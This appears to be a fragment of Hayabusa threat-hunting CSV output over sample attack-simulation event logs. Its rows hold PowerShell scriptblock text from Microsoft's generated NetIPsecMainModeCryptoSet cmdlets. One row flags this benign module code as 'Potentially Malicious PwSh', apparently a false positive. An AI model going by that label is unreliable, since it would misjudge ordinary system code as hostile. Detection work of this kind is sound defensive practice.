[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' -Alias '*' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetNam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' -Alias '*' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) 